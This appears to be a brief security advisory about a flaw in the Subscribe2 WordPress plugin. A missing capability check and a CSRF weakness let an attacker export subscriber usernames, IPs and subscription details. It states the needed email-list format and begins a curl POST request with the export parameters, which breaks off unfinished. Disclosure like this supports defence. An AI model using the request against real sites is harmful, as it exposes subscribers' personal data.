Subscribe2 [Sensitive Data Exposure]


Plugin Subscribe2 is vulnerable because it doesn’t check capabilities to export csv file with subscribed users. In addition a CSRF attack is possible to this action.

The caveat is that in order to get data in CSV file, an attacker must pass email accounts from users that have a valid account at the infected website. The list with email accounts must be valid emails separated with a comma and Windows line separator (",\r\n")

The CSV file contains the username, IP and other newsletter subscription relative information.


curl -XPOST -d "s2_admin=1&csv=1&" \